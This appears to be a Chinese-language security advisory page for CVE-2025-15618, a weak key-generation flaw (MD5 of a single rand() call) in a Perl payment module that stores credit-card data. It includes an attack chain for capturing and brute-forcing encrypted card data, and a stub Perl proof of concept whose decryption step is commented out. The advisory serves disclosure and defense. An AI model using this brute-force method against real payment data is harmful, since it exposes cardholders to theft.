CVE-2025-15618 CVSS 9.1 严重

CVE-2025-15618 Perl模块弱加密密钥漏洞

披露日期: 2026-03-31

来源: 9b29abf9-4ab0-4765-b253-1875cd9b441e

漏洞信息

漏洞编号

CVE-2025-15618

漏洞类型

不安全的随机数生成

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Business::OnlinePayment::StoredTransaction

漏洞概述

Business::OnlinePayment::StoredTransaction Perl模块（0.01及以下版本）存在严重安全漏洞。该模块用于处理信用卡交易数据，但在生成加密密钥时使用了不安全的方法。具体而言，它仅对内置rand函数的一次调用结果进行MD5哈希来生成密钥。由于rand函数不具备密码学安全性，其输出极易被预测或暴力破解。攻击者可利用此缺陷推导出加密密钥，进而解密敏感的信用卡信息，导致严重的数据泄露风险。

技术细节

该漏洞的核心在于密钥生成算法的弱随机性。Business::OnlinePayment::StoredTransaction在初始化时通过调用`md5_hex(rand())`来生成用于加密数据的密钥。Perl的内置rand函数通常不是密码学安全的伪随机数生成器（CSPRNG），其输出具有可预测性，且熵值较低。

攻击原理如下：
1. **低熵空间**：单次调用rand函数输出的可能值范围有限（通常取决于系统实现，可能只有2^15到2^31种可能性）。
2. **离线破解**：攻击者一旦获取到加密的信用卡数据，可以在本地编写脚本，遍历所有可能的rand输出，计算对应的MD5值，并尝试使用该值作为密钥解密数据。
3. **高成功率**：由于计算成本极低，攻击者能在短时间内匹配到正确的密钥，从而恢复出明文的信用卡号、有效期等敏感信息。该漏洞允许攻击者在无需认证和用户交互的情况下，通过网络获取加密数据并离线破解。

攻击链分析

STEP 1

步骤1：侦察

攻击者确认目标系统使用了Business::OnlinePayment::StoredTransaction Perl模块进行支付处理。

STEP 2

步骤2：数据截获

攻击者通过网络嗅探、数据库泄露或日志访问获取加密的信用卡交易数据。

STEP 3

步骤3：密钥破解

攻击者利用脚本遍历rand()的可能输出，计算MD5值，尝试解密截获的数据以寻找正确的密钥。

STEP 4

步骤4：数据解密

一旦找到匹配的密钥，攻击者解密所有受影响的密文，获取明文信用卡号和敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/perl
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);

# PoC for CVE-2025-15618: Weak Key Generation
# This script demonstrates the feasibility of brute-forcing the secret key
# generated by MD5(rand()).

print "[*] Starting PoC for CVE-2025-15618...\n";

my $captured_ciphertext = "..."; # Replace with actual captured encrypted data
my $found_key = "";

# The vulnerable module uses a single call to rand().
# Depending on the Perl version and platform, rand() might have limited precision.
# We iterate through a reasonable range of possible rand() outputs to simulate the attack.
# Note: Real-world exploitation depends on the specific rand() implementation details.

my $max_attempts = 100000; 

for (my $i = 0; $i < $max_attempts; $i++) {
    # Simulate the vulnerable key generation logic
    # my $key = md5_hex(rand()); 
    # We simulate 'rand' returning a value or just iterate integers to represent limited entropy space
    my $simulated_rand = $i; 
    my $potential_key = md5_hex($simulated_rand);

    # In a real attack, check if this key decrypts the ciphertext successfully
    # if (decrypt($potential_key, $captured_ciphertext) =~ /\d{16}/) {
    #     $found_key = $potential_key;
    #     last;
    # }
}

if ($found_key) {
    print "[+] Key found: $found_key\n";
} else {
    print "[-] Key not found in limited simulation. Adjust range based on system rand().\n";
}

影响范围

Business::OnlinePayment::StoredTransaction <= 0.01

防御指南

临时缓解措施

如果无法立即升级，应暂停使用该模块处理新的交易，并评估已泄露数据的风险。同时，严格控制对存储加密数据的数据库的访问权限，增加网络层面的监控以防止数据被批量导出。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表